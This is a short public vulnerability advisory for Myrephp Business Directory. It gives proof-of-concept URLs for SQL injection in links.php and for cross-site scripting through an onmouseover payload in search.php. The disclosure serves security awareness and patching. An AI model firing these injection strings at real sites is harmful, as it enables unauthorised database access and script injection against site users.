Myrephp Business Directory Multiple Vulnerabilities

2012-11-14 / 2013-08-26
Credit: d3b4g
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

# Exploit Title: Myrephp Business Directory, Multiple Vulnerabilities # Date: 13.10.201 # Exploit Author: d3b4g # Vendor Homepage:http://myrephp.com # Software Link: http://myrephp.com/biz/ # Tested on: Windows 7 # Blog: d3b4g.me ---------------------------------------------------------------------------------- () SQL Injection : --------------------------- http://localhost/path/links.php?cat=1'[Insert Query] () Cross Site Scripting:- http:localhost/path/search.php?keywords1=&keywords2=&look=%27%20onmouseover%3dprompt%28945724%29%20bad%3d%27&nolinks1=10&order=city&page=2&sort=ASC

Referencje:

http://myrephp.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top